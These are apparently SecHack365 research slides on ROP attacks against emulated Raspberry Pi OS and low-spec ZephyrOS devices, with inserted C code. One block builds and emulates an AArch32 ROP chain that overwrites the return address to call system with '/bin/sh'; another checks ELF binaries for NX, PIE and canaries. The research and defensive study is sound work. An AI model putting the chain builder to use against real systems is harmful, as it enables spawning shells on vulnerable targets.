・Emulate Raspberry Pi OS on Arm Cortex-A53 using QEMU and launch a ROP attack against a vulnerable test server.
30. Attack Target Environment
OS: Raspberry Pi OS
Arch: Armv8-A
Server program source code: http://kozos.jp/samples/rop-sample.html
Processor execution state: AArch32
Security measures:
・NX bit: Active
・SSP: Inactive
・ASLR: Inactive
・CFI: Inactive
32. Exploit code (ROP chain part)
r0 register: holds parameter 1 (the AArch32 calling convention passes the first argument in r0, not on the stack)
pc register: program counter
r4 register: popped, but not used here
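The same chain for the AArch32 target of slides 30 and 32, as an added example in C that is not the exploit from the referenced kozos.jp sample: on AArch32 the first argument travels in r0, so the chain needs a pop {r0, pc} gadget, and there is no ret; the epilogue's pop {..., pc} loads the next address straight into pc. The frame layout (a 16-byte buf, then saved r4, then saved lr), the gadget address 0x00010100 and the libc addresses are assumptions made for illustration; only the register roles (r0 = parameter 1, pc, r4 unused) come from the slide. The emulator also models the interworking bit: on ARMv5T and later a pop into pc switches to Thumb state when bit 0 of the value is set, so every address in the chain must carry the ISA bit of the code it points to.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed frame of the vulnerable AArch32 function (not from the slides): buf (16) | saved r4 | saved lr. */
#define A32_BUF      16u
#define A32_PADDING  A32_BUF              /* bytes before the saved r4 slot */

/* Assumed (hypothetical) gadget address: 'pop {r0, pc}' in ARM state, so bit 0 is clear. */
#define POP_R0_PC    0x00010100u

static void put32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));   /* little-endian */
}

static uint32_t get32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Payload: 'A'*16 | junk -> r4 | pop {r0,pc} -> pc | &"/bin/sh" -> r0 | system -> pc */
size_t build_a32_chain(uint8_t *out, size_t cap, uint32_t binsh, uint32_t system_addr)
{
    size_t need = A32_PADDING + 4u * 4u;
    if (cap < need) return 0;
    memset(out, 'A', A32_PADDING);
    size_t off = A32_PADDING;
    put32(out + off, 0x41414141u); off += 4;  /* lands in r4, unused by the chain */
    put32(out + off, POP_R0_PC);   off += 4;  /* overwrites saved lr: popped straight into pc */
    put32(out + off, binsh);       off += 4;  /* first argument of system() */
    put32(out + off, system_addr); off += 4;  /* next pc, bit 0 = ISA of system() */
    return off;
}

struct a32_cpu { uint32_t r0, r4, pc, sp; bool thumb, ok; };

/* pop {reg}: reg = [sp]; sp += 4. A pop into pc also interworks: bit 0 selects Thumb state. */
static bool a32_pop(struct a32_cpu *c, const uint8_t *stack, size_t len, uint32_t *dst, bool is_pc)
{
    if (c->sp + 4 > len) { c->ok = false; return false; }   /* chain runs off the payload */
    uint32_t v = get32(stack + c->sp);
    c->sp += 4;
    if (is_pc) { c->thumb = (v & 1u) != 0; v &= ~1u; }
    *dst = v;
    return true;
}

/* Replay the epilogue 'pop {r4, pc}' and the gadget 'pop {r0, pc}' over the payload. */
struct a32_cpu emulate_a32_chain(const uint8_t *payload, size_t len, uint32_t system_addr)
{
    struct a32_cpu c = { .sp = A32_BUF, .ok = true };          /* epilogue starts with sp at saved r4 */
    if (!a32_pop(&c, payload, len, &c.r4, false)) return c;  /* pop {r4, pc}: r4 = junk ... */
    if (!a32_pop(&c, payload, len, &c.pc, true))  return c;  /* ... pc = gadget */
    if (c.pc != POP_R0_PC || c.thumb) { c.ok = false; return c; }   /* gadget must be entered in ARM state */
    if (!a32_pop(&c, payload, len, &c.r0, false)) return c;  /* pop {r0, pc}: r0 = &"/bin/sh" ... */
    if (!a32_pop(&c, payload, len, &c.pc, true))  return c;  /* ... pc = system, state from bit 0 */
    if (c.pc != (system_addr & ~1u)) c.ok = false;
    return c;
}
```

Two differences from the x86_64 chain are worth noting: every slot is 4 bytes, and no alignment fixup is needed, because AAPCS only requires sp to be 8-byte aligned at public interfaces and the chain pops an even number of words. Setting the wrong ISA bit on the system address produces an undefined-instruction fault rather than a shell, which is a common reason an otherwise correct AArch32 chain fails.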
33. Examination Results
・The Raspberry Pi 3B+ is a high-spec embedded device on which many security mechanisms are available, so without disabling those mechanisms the ROP attack was unsuccessful.
34. Verification summary so far
Target                      NX bit   ASLR   SSP   CFI
CentOS6 on i686             〇       〇     〇    ×
RaspiOS on Arm Cortex-A53   〇       〇     〇    ×
ZephyrOS on Arm Cortex-M0   ?        ?      ?     ?
※ 〇 = enabled by default, × = not enabled, ? = not yet verified
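To fill in a row of the table above for a given binary, here is an added example (not the author's tooling) that reads the columns that can be decided from the ELF file itself: NX from the flags of the PT_GNU_STACK program header, whether the main image can be randomized by ASLR (ET_DYN, i.e. PIE; ASLR itself is a kernel setting, /proc/sys/kernel/randomize_va_space on Linux), and SSP from the presence of the __stack_chk_fail symbol name, the same heuristic checksec uses. CFI cannot be read this way and is left out. The check handles little-endian ELF32 and ELF64 headers, so it covers the i686, AArch32 and x86_64 targets on the table; make_sample_elf64 constructs a synthetic, non-loadable image purely for testing.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Binary-side view of the table columns. CFI is not detectable from the headers and is left out. */
struct mitigations { bool valid, nx, pie, canary; };

#define PT_GNU_STACK 0x6474e551u
#define PF_X    1u
#define ET_EXEC 2u
#define ET_DYN  3u

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Byte-wise search; __stack_chk_fail in .dynstr means the binary was built with -fstack-protector*. */
static bool contains(const uint8_t *img, size_t len, const char *s)
{
    size_t n = strlen(s);
    for (size_t i = 0; n <= len && i + n <= len; i++)
        if (memcmp(img + i, s, n) == 0) return true;
    return false;
}

/* Little-endian ELF32/ELF64 only (x86_64, i686, AArch32/AArch64 Linux). Field offsets follow the ELF spec. */
struct mitigations check_elf(const uint8_t *img, size_t len)
{
    struct mitigations m = {0};
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[5] != 1) return m;
    bool is64 = img[4] == 2;                       /* EI_CLASS: 1 = ELF32, 2 = ELF64 */
    if (is64 && len < 64) return m;
    uint64_t phoff  = is64 ? ((uint64_t)rd32(img + 0x20) | ((uint64_t)rd32(img + 0x24) << 32))
                           : rd32(img + 0x1c);
    uint16_t phsize = rd16(img + (is64 ? 0x36 : 0x2a));   /* e_phentsize */
    uint16_t phnum  = rd16(img + (is64 ? 0x38 : 0x2c));   /* e_phnum */
    if (phsize < (is64 ? 56 : 32)) return m;
    m.valid = true;
    m.pie = rd16(img + 0x10) == ET_DYN;            /* e_type */
    m.nx = false;                                  /* conservative: no PT_GNU_STACK counts as executable stack */
    for (uint16_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phsize;
        if (off > len || phsize > len - off) { m.valid = false; break; }   /* truncated header table */
        const uint8_t *ph = img + off;
        uint32_t p_type  = rd32(ph);
        uint32_t p_flags = rd32(ph + (is64 ? 4 : 24));   /* p_flags sits after p_type (64) or last-but-one (32) */
        if (p_type == PT_GNU_STACK) m.nx = (p_flags & PF_X) == 0;
    }
    m.canary = contains(img, len, "__stack_chk_fail");
    return m;
}

/* Constructed ELF64 image for testing (header + one PT_GNU_STACK + optional symbol name); not loadable. */
size_t make_sample_elf64(uint8_t *out, size_t cap, bool exec_stack, bool pie, bool canary)
{
    const char *sym = "__stack_chk_fail";
    size_t need = 64 + 56 + (canary ? strlen(sym) + 1 : 0);
    if (cap < need) return 0;
    memset(out, 0, need);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = 2; out[5] = 1; out[6] = 1;            /* ELF64, little-endian, version 1 */
    out[0x10] = (uint8_t)(pie ? ET_DYN : ET_EXEC);
    out[0x12] = 0x3e;                              /* EM_X86_64 */
    out[0x20] = 64;                                /* e_phoff: table directly after the header */
    out[0x36] = 56;                                /* e_phentsize */
    out[0x38] = 1;                                 /* e_phnum */
    wr32(out + 64, PT_GNU_STACK);
    wr32(out + 68, exec_stack ? 7u : 6u);          /* PF_R|PF_W, plus PF_X for an executable stack */
    if (canary) memcpy(out + 120, sym, strlen(sym) + 1);
    return need;
}
```

To use it on a real target, read the file into memory and call check_elf on it; readelf -lW target | grep GNU_STACK gives the same NX answer for cross-checking, and the SSP column can be confirmed with readelf -s target | grep __stack_chk_fail. A missing PT_GNU_STACK header is reported as NX off, which is the conservative reading: the Linux kernel then falls back to an architecture- and version-dependent default for the stack's execute permission.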
35. ROP attack on a low-spec embedded device
Investigate the feasibility of ROP attacks against ZephyrOS on Arm Cortex-M0.
→ Survey result: ZephyrOS on Arm Cortex-M0 may have no countermeasures against ROP.
36. ZephyrOS
・An embedded OS that can run on boards with strict resource restrictions.
・ZephyrOS supports many boards,
e.g. Arduino-mega2560, microbit, STM32F0 series…
37. Memory protection in ZephyrOS
The following memory protection features are implemented:
・Stack protection
・Memory isolation
・Thread isolation
All of them require an MPU.
38. Memory Protection Unit (MPU)
・On low-spec processors that cannot afford an MMU, the MPU is the critical hardware for memory protection.
・It divides the address space into several regions and sets access rights for each region.
39. Arm Cortex-M0
・A low-power processor used in the STM32F0 series boards and the micro:bit.
・It has no Memory Protection Unit (MPU), so the MPU-based protection used by many OSs cannot be applied.
40. ROP countermeasures in low-spec embedded devices
・Currently the following countermeasures can be considered for implementation.
41. Conclusion
・When CFI and ASLR are not applied to the program, gaining control with a simple ROP attack is possible.
・Consider implementing ROP countermeasures in low-spec embedded devices, and implement security measures where necessary.
42. Acknowledgements
・Special thanks to the National Institute of Information and Communications Technology, which organizes SecHack365, and to its trainer Hiroaki Sakai, who taught the basics of program execution and debugging on which this research is founded.
Thank you, Mr. Sakai and all SecHack365 staff.